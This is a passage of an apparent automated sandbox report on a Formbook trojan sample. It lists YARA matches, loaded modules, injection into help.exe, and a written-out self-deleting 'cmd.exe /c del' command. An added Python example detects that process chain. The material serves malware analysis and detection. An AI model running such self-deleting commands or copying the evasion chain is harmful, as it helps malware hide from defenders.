        2_2_01A9DAAC, 2_2_01AA1AA3, 2_2_01AADAC6, 2_2_01A73A6C, 2_2_01ABFA49,
        2_2_01AB7A46, 2_2_01A1FDC0, 2_2_01AB7D73, 2_2_01A03D40, 2_2_01AB1D5A,
        2_2_01ABFCF2, 2_2_01A79C32, 2_2_01ABFFB1, 2_2_01A01F92, 2_2_01ABFF09,
        2_2_01A09EB0
Source: C:\Windows\explorer.exe
    Code functions: 3_2_0DE275CD, 3_2_0DE1BD02, 3_2_0DE21912, 3_2_0DE1A082, 3_2_0DE23036,
        3_2_0DE1EB30, 3_2_0DE1EB32, 3_2_0DE24232, 3_2_0DF0F232, 3_2_0DF125CD,
        3_2_0DF09B30, 3_2_0DF09B32, 3_2_0DF0C912, 3_2_0DF06D02, 3_2_0DF05082,
        3_2_0DF0E036
Source: C:\Windows\SysWOW64\help.exe
    Code functions: 4_2_033BA352, 4_2_0330E3F0, 4_2_033C03E6, 4_2_033A0274, 4_2_033802C0,
        4_2_0339A118, 4_2_032F0100, 4_2_03388158, 4_2_033C01AA, 4_2_033B41A2,
        4_2_033B81CC, 4_2_03392000, 4_2_03300770, 4_2_03324750, 4_2_032FC7C0,
        4_2_0331C6E0, 4_2_03300535, 4_2_033C0591, 4_2_033A4420, 4_2_033B2446,
        4_2_033AE4F6, 4_2_033BAB40, 4_2_033B6BD7, 4_2_032FEA80, 4_2_03316962,
        4_2_033029A0, 4_2_033CA9A6, 4_2_0330A840, 4_2_03302840, 4_2_032E68B8,
        4_2_0332E8F0, 4_2_03320F30, 4_2_033A2F30, 4_2_03342F28, 4_2_03374F40,
        4_2_0337EFA0, 4_2_0330CFE0, 4_2_032F2FC8, 4_2_033BEE26, 4_2_03300E59,
        4_2_03312E90, 4_2_033BCE93, 4_2_033BEEDB, 4_2_0339CD1F, 4_2_0330AD00,
        4_2_03318DBF, 4_2_032FADE0, 4_2_03300C00, 4_2_033A0CB5, 4_2_032F0CF2,
        4_2_033B132D, 4_2_032ED34C, 4_2_0334739A, 4_2_033052A0, 4_2_033A12ED,
        4_2_0331B2C0, 4_2_033CB16B, 4_2_032EF172, 4_2_0333516C, 4_2_0330B1B0,
        4_2_033B70E9, 4_2_033BF0E0, 4_2_033070C0, 4_2_033AF0CC, 4_2_033BF7B0,
        4_2_03345630, 4_2_033B16CC, 4_2_033B7571, 4_2_0339D5B0, 4_2_033BF43F,
        4_2_032F1460, 4_2_033BFB76, 4_2_0331FB80, 4_2_03375BF0, 4_2_0333DBF9,
        4_2_03373A6C, 4_2_033BFA49, 4_2_033B7A46, 4_2_03345AA0, 4_2_0339DAAC,
        4_2_033A1AA3, 4_2_033ADAC6, 4_2_03395910, 4_2_03309950, 4_2_0331B950,
        4_2_0336D800, 4_2_033038E0, 4_2_033BFF09, 4_2_033BFFB1, 4_2_03301F92,
        4_2_032C3FD5, 4_2_032C3FD2, 4_2_03309EB0, 4_2_033B7D73, 4_2_033B1D5A,
        4_2_03303D40, 4_2_0331FDC0, 4_2_03379C32, 4_2_033BFCF2, 4_2_0294E0F1,
        4_2_0294E59D, 4_2_0294EB76, 4_2_02932FB0, 4_2_02932D90, 4_2_02932D89,
        4_2_02939E5B, 4_2_02939E60
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
    Code function: String function: 01A7F290 appears 105 times
    Code function: String function: 01A35130 appears 58 times
    Code function: String function: 019EB970 appears 280 times
    Code function: String function: 01A47E54 appears 102 times
    Code function: String function: 01A6EA12 appears 86 times
Source: C:\Windows\SysWOW64\help.exe
    Code function: String function: 03335130 appears 58 times
    Code function: String function: 0336EA12 appears 86 times
    Code function: String function: 03347E54 appears 103 times
    Code function: String function: 0337F290 appears 105 times
    Code function: String function: 032EB970 appears 280 times
                Source: duGqHKp0OUXaX1D.exe | Static PE information: invalid certificate
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1373385735.0000000005B70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1369670156.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWagon.dll> vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWagon.dll> vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.00000000014AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.0000000001AED000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D44000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs duGqHKp0OUXaX1D.exe
                Source: duGqHKp0OUXaX1D.exe | Binary or memory string: OriginalFilenameuSpw.exeX vs duGqHKp0OUXaX1D.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: windowscodecs.dll
                Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
                Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: wininet.dll
                Source: duGqHKp0OUXaX1D.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: help.exe PID: 7700, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: duGqHKp0OUXaX1D.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack, ivtNue3aMakjbVsfus.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.raw.unpack, ivtNue3aMakjbVsfus.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, DcAJfbQ7wU7SQxmjqR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3ad8480.3.raw.unpack, IN0CtjOPkLO1DWAhVX.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.duGqHKp0OUXaX1D.exe.5b70000.7.raw.unpack, DcAJfbQ7wU7SQxmjqR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.duGqHKp0OUXaX1D.exe.3a4ca60.2.raw.unpack, DcAJfbQ7wU7SQxmjqR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@144/1@11/8
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\duGqHKp0OUXaX1D.exe.log
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                Source: duGqHKp0OUXaX1D.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: duGqHKp0OUXaX1D.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: duGqHKp0OUXaX1D.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
                Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
                Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: duGqHKp0OUXaX1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: duGqHKp0OUXaX1D.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: duGqHKp0OUXaX1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
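The process chain listed above (the sample relaunching its own image, explorer.exe spawning C:\Windows\SysWOW64\help.exe, and help.exe spawning cmd.exe /c del against the original sample path) is the kind of sequence a detection engineer wants to match in endpoint process-creation telemetry rather than on a file hash. The Python below is an added example and is not part of the Joe Sandbox report or its tooling. The event records are constructed from the chain above: PIDs 7548, 7656 (duGqHKp0OUXaX1D.exe) and 7700 (help.exe) are the ones the report gives, while the explorer.exe and cmd.exe PIDs and the event field names are assumptions. It flags two things: a process that launches a second copy of its own image (a common staging step for process hollowing) and a cmd.exe that deletes a file which is the image of a process in the same tree (self-deletion of the dropper), reported together with the parent that requested it.

```python
import re
from collections import defaultdict

# Constructed process-creation events modelled on the chain listed in this
# report. PIDs 7548, 7656 (duGqHKp0OUXaX1D.exe) and 7700 (help.exe) are the
# report's; the explorer.exe and cmd.exe PIDs and the field names are assumed.
SAMPLE = r"C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
EVENTS = [
    {"pid": 7548, "ppid": None, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 7656, "ppid": 7548, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 3200, "ppid": None, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7700, "ppid": 3200, "image": r"C:\Windows\SysWOW64\help.exe",
     "cmdline": r"C:\Windows\SysWOW64\help.exe"},
    {"pid": 7732, "ppid": 7700, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'/c del "{SAMPLE}"'},
]

# `del` followed by a quoted or a bare path, as cmd.exe receives it.
DEL_RE = re.compile(r'\bdel\b\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def _by_pid(events):
    return {e["pid"]: e for e in events}


def lineage(events, pid):
    """Image paths from the root of the tree down to `pid`."""
    by_pid = _by_pid(events)
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def find_self_spawn(events):
    """A process launching a second copy of its own image: a common staging
    step for process hollowing. Returns (parent_pid, child_pid, image)."""
    by_pid = _by_pid(events)
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is not None and parent["image"].lower() == e["image"].lower():
            hits.append((parent["pid"], e["pid"], e["image"]))
    return hits


def find_self_delete(events):
    """cmd.exe deleting a file that is the image of a process in the same
    tree, reported with the parent that asked for the deletion."""
    by_pid = _by_pid(events)
    pids_by_image = defaultdict(list)
    for e in events:
        pids_by_image[e["image"].lower()].append(e["pid"])
    hits = []
    for e in events:
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = (m.group(1) or m.group(2)).lower()
        if target in pids_by_image:
            parent = by_pid.get(e["ppid"])
            hits.append({
                "cmd_pid": e["pid"],
                "parent_image": parent["image"] if parent else None,
                "deleted": target,
                "deleted_pids": pids_by_image[target],
            })
    return hits


if __name__ == "__main__":
    for parent, child, image in find_self_spawn(EVENTS):
        print(f"self-spawn: {parent} -> {child} ({image})")
    for h in find_self_delete(EVENTS):
        print(f"self-delete requested by {h['parent_image']}: {h['deleted']} (pids {h['deleted_pids']})")
    print(" -> ".join(lineage(EVENTS, 7732)))
```

The self-delete rule deliberately matches on the image path rather than on the parent name, so it still fires when the injected host is something other than help.exe; the parent is carried along in the finding for triage.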
                Source: Binary string: wntdll.pdbUGP source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: duGqHKp0OUXaX1D.exe, duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: uSpw.pdb source: duGqHKp0OUXaX1D.exe
                Source: Binary string: help.pdbGCTL source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: help.pdb source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: uSpw.pdbSHA256 source: duGqHKp0OUXaX1D.exe

                Data Obfuscation

